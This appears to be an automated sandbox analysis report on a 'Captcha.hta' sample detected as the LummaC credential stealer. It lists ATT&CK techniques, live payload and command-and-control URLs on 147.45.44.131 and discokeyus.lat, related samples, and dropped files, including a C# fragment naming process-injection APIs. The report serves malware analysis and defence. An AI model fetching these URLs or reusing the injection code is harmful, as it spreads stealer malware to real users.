Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	11 File and Directory Discovery	Remote Services	1 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	311 Process Injection	31 Obfuscated Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	121 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Command and Scripting Interpreter	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	121 Virtualization/Sandbox Evasion	LSA Secrets	121 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	311 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Captcha.hta	20%	Virustotal		Browse
Captcha.hta	21%	ReversingLabs	Document-HTML.Trojan.Lummastealer

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll	100%	Avira	HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
discokeyus.lat	172.67.197.170	true	true		unknown
grannyejh.lat	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Reputation
http://147.45.44.131/infopage/knhy.exe	true	unknown
necklacebudi.lat	false	high
https://discokeyus.lat/api	true	unknown
aspecteirs.lat	false	high
energyaffai.lat	false	high
http://147.45.44.131/infopage/bhgto.ps1	true	unknown
sustainskelet.lat	false	high
crosshuaht.lat	false	high
rapeflowwj.lat	false	high
grannyejh.lat	false	high
discokeyus.lat	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmp	false	high
http://147.45.44.131/infopage/bnkh.exe	powershell.exe, 00000005.00000002.1737453939.00000000051B6000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://discokeyus.lat/S	RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmp	false	high
https://go.micro	powershell.exe, 00000005.00000002.1737453939.000000000530C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://147.45.44.131/infopage/bhgto.ps1#f	curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://contoso.com/License	powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmp	false	high
http://147.45.44.131	powershell.exe, 00000005.00000002.1737453939.0000000005013000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737453939.00000000051B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737453939.0000000005196000.00000004.00000800.00020000.00000000.sdmp	true	unknown
http://crl.micro	RegAsm.exe, 00000008.00000002.1937052782.00000000010B6000.00000004.00000020.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000005.00000002.1737453939.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	RegAsm.exe, 00000008.00000002.1937957812.000000000375C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discokeyus.lat/	RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.1739806714.0000000005F2B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://147.45.44.131/infopage/bhgto.ps1?g	curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://147.45.44.131/infopage/bhgto.ps1MgH	curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://imp.mt48.net/static?id=	RegAsm.exe, 00000008.00000002.1937957812.000000000375C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discokeyus.lat:443/api	RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://discokeyus.lat/apiP	RegAsm.exe, 00000008.00000002.1937052782.000000000108B000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.1737453939.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discokeyus.lat/B	RegAsm.exe, 00000008.00000002.1937475217.0000000001116000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://discokeyus.lat:443/apiuser	RegAsm.exe, 00000008.00000002.1937052782.00000000010A0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://147.45.44.131/infopage/bhgto.ps1Qf	curl.exe, 00000004.00000002.1695164199.0000000003488000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.45.44.131	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	true
172.67.197.170	discokeyus.lat	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578704
Start date and time:	2024-12-20 07:17:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Captcha.hta
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winHTA@14/10@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 92% Number of executed functions: 41 Number of non-executed functions: 104
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.109.210.53, 13.107.246.63
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 1516 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:17:59	API Interceptor	33x Sleep call for process: powershell.exe modified
01:18:03	API Interceptor	9x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.45.44.131	htZgRRla8S.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.44.131/infopage/ung0.exe
	Captcha.hta	Get hash	malicious	LummaC, Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	147.45.44.131/infopage/ilk.exe
	Captcha.hta	Get hash	malicious	HTMLPhisher	Browse	147.45.44.131/infopage/bgfi.ps1
	Captcha.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	147.45.44.131/infopage/ung0.exe
	EBUdultKh7.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.44.131/infopage/vsom.exe
	MiJZ3z4t5K.exe	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/Tom.exe
	ZjH6H6xqo7.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tvh53.exe
	nlJ2sNaZVi.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbh75.exe
	TZ33WZy6QL.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbg9.exe
	7IXl1M9JGV.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbg9.exe
172.67.197.170	iOnDpwrkWY.exe	Get hash	malicious	LummaC	Browse
	hzD92yQcTT.exe	Get hash	malicious	LummaC	Browse
	V-Mail_maryland.gov.html	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	https://simanis.sman5semarang.sch.id/kro/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discokeyus.lat	k6A01XaeEn.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	iOnDpwrkWY.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	hzD92yQcTT.exe	Get hash	malicious	LummaC	Browse	172.67.197.170

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	172.67.180.113
	8ZVMneG.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA%20us-east-2.protection.sophos.com	Get hash	malicious	HTMLPhisher	Browse	104.21.49.70
	Laurier Partners Proposal.eml	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	Dec 2024_12192924_Image.pdf	Get hash	malicious	HTMLPhisher	Browse	104.21.49.70
	http://senalongley.com	Get hash	malicious	Unknown	Browse	104.21.96.47
	https://f.io/nWWUxvn6	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	c9toH15OT0.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	104.21.23.76
	Executed_Innocap-#81(Final.pdf	Get hash	malicious	Unknown	Browse	104.21.11.54
FREE-NET-ASFREEnetEU	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	147.45.113.159
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	147.45.113.159
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	147.45.113.159
	https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6i	Get hash	malicious	HTMLPhisher	Browse	147.45.179.98
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse	147.45.113.159
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	147.45.113.159
	iviewers.dll	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	147.45.47.15
	script.ps1	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	147.45.47.15
	script.hta	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	147.45.47.15
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	147.45.49.155

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	172.67.197.170
	8ZVMneG.exe	Get hash	malicious	LummaC	Browse	172.67.197.170
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	172.67.197.170
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	172.67.197.170
	hubus.exe	Get hash	malicious	LummaC, PureLog Stealer, zgRAT	Browse	172.67.197.170
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, LummaC Stealer	Browse	172.67.197.170
	file.exe	Get hash	malicious	ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar	Browse	172.67.197.170
	mirabon.msi	Get hash	malicious	BruteRatel, Latrodectus	Browse	172.67.197.170
	Tii6ue74NB.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar	Browse	172.67.197.170
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS	Browse	172.67.197.170

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	10583
Entropy (8bit):	4.487855797297623
Encrypted:	false
SSDEEP:	192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
MD5:	B022C6FE4494666C8337A975D175C726
SHA1:	8197D4A993E7547D19D7B067B4D28EBE48329793
SHA-256:	D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
SHA-512:	DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
Malicious:	true
Preview:	.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	204
Entropy (8bit):	5.0183418458769795
Encrypted:	false
SSDEEP:	6:pAu+H2L/6K2wkn23fFjvFJJUzxszIwkn23fFjvf:p37L/6KRfNjv6QfNjvf
MD5:	3774DC42CF9E9485E05C92C1879B1840
SHA1:	73B04E09E578F19CEB8866AD02736AF5D2E90185
SHA-256:	7CD3B5991A27E58B948C9F6A048785C27CEB52DDA4EE1F4EEC6720D28B87D687
SHA-512:	4CA903DBEA2EDD021920FCE4FC80AEC3D5B9D4D85B70351F78EC43CC2F3963DB563E7946EE429DDA9152AB99DAAA8E96C3286558525034C9BEDD7E0577FDDEA8
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.0.cs"

C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	4.660631941487504
Encrypted:	false
SSDEEP:	192:/0CaQHf9WDa/u65Rj2cajUxd5MqmeNcV:/3WDl895e05MqJyV
MD5:	5F1DD7B556601C708CD708E2ABE8F9BD
SHA1:	95D4C5FDAF10769E94004C6B30C9ECE35628B463
SHA-256:	DFF7A2D1B2D8704D76AA627B7ADC13970EF768D47671A532360D3590E4F38D60
SHA-512:	E2EA610C65C6E2B8F4CC908E24EF5B467AFD0BFD7E47F46C81810EE46234498D12C0B3805D1414366C3E2400177F5189FA6A5A51ADBBA17A9513BED46A428F38
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&eg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(...."..(......(.......0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p.....(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	702
Entropy (8bit):	5.245112529951363
Encrypted:	false
SSDEEP:	12:KJN/qR37L/6KRfNjv6QfNjvGKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfh1fhGKax5DqBVKVrdFAMBt
MD5:	F84659E8CD1E1033C0C955790A633AEA
SHA1:	0DFA59EF02B42228C80D1C35FAE12A7E29F563B4
SHA-256:	4C4CE7A3D013FFB982C955B10FB1500A12667A35DE2C55F81A7C8BDF52AAC9BC
SHA-512:	A10F5D2B296364878292EFDAFAF23B0CC4F9455C8BD7BD285C302534C52A3308C933BEC244EECACC1925603165FC197954A4A98538035A28551377770590356D
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.084178750454184
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry4ak7Ynqq+PN5Dlq5J:+RI+ycuZhN2akS+PNnqX
MD5:	27234BE8D2CE3231EAAC1D9EAC1DC0DD
SHA1:	3B480C5C86E5AE3BBF183B68D8E45EBB2898BB2C
SHA-256:	2A12630A4D562CEC3AFBF09063AE71BDE3C11269AD3AC7D402E99BC1CE373E70
SHA-512:	0AEADF4872FACC49C3729CB021CEF026BBD053AD81D37210DA3E45F98F21FBC87AC0BB1F456CE10EB2E8B30AC4E1C27C03C614867C6C0B6C06C0ED8E571D2CA3
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.b.q.s.2.a.o.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.b.q.s.2.a.o.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES1090.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Dec 20 08:08:49 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.9634112364046885
Encrypted:	false
SSDEEP:	24:HFe9EuZfxBXDfHxwKEbsmfII+ycuZhN2akS+PNnqSqd:MBfz6KPmg1ul2a3iqSK
MD5:	0F9E12A5B5C9C04FCC0C4C0D5072C90A
SHA1:	11F2DDDC93FF8FD170F37F59BCF7EBA74483D6ED
SHA-256:	C340BFE0689EA612E7BAB941E614B008E024E6112B5C1B7F5E6C5BAA82FA0CF6
SHA-512:	932FD66A661D4B1D0EACD515DCEB551DC295C5CFE6433ADB40C1F5276CEC6D9589BC7E2D24246D4C40A95BAD4909561D0CA874B30A85095B53A5C77A7FA96074
Malicious:	false
Preview:	L....&eg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP................'#K...21.................4.......C:\Users\user\AppData\Local\Temp\RES1090.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.b.q.s.2.a.o.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhnkmr1l.5py.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mli0y3mh.qvs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\curl.exe
File Type:	ASCII text, with CR, LF line terminators
Category:	dropped
Size (bytes):	478
Entropy (8bit):	2.9758009113154573
Encrypted:	false
SSDEEP:	6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgcdivIdoUN0cQOIu:Vz6ykymUexb1U9cL9cddopcQnu
MD5:	51CBDCDE7B9A416AD4487C23C8476FD4
